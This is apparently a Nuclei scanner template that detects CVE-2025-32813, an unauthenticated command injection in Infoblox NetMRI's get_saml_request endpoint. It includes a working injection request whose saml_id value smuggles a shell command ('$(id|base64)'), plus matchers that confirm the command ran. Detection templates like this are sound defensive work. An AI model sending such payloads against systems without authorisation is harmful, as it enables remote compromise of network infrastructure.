Description
An issue was discovered in Infoblox NETMRI before 7.6.1. Remote Unauthenticated Command Injection can occur.
An issue was discovered in Infoblox NETMRI before 7.6.1. Remote Unauthenticated Command Injection can occur.
id: CVE-2025-32813
info:
name: Infoblox NetMRI < 7.6.1 - Unauthenticated Command Injection in get_saml_request
author: iamnoooob,pdresearch
severity: high
description: |
An issue was discovered in Infoblox NETMRI before 7.6.1. Remote Unauthenticated Command Injection can occur.
impact: |
Unauthenticated attackers can execute arbitrary operating system commands with elevated privileges through the saml_id parameter in the get_saml_request endpoint.
remediation: |
Upgrade to Infoblox NetMRI version 7.6.1 or later that properly sanitizes user input in SAML request handling.
reference:
- https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
- https://github.com/RhinoSecurityLabs/CVEs
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2025-32813
cwe-id: CWE-77
epss-score: 0.43894
epss-percentile: 0.9868
cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: infoblox
product: netmri
fofa-query: "Infoblox NetMRI"
tags: cve,cve2025,infoblox,netmri,rce,vkev,vuln
http:
- raw:
- |
GET /webui/application/get_saml_request?saml_id=1%26$(id|%20base64); HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: idcmd
part: body
group: 1
regex:
- "sh: (.*?): command"
internal: true
matchers:
- type: dsl
dsl:
- 'contains_all(body, "sh", ": command not found","message")'
- 'contains(content_type,"application/json")'
- 'contains_all(base64_decode(idcmd),"uid=","gid=")'
- 'status_code==500'
condition: and
# digest: 4a0a00473045022020f563ad0da8d5de3e5d9c21012665184a3a71fcbf6767a26b9868aa7cb2b9fb02210094b0affd6d33114c750d16405975237a7956cc6f2edb42cc874739202b696878:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.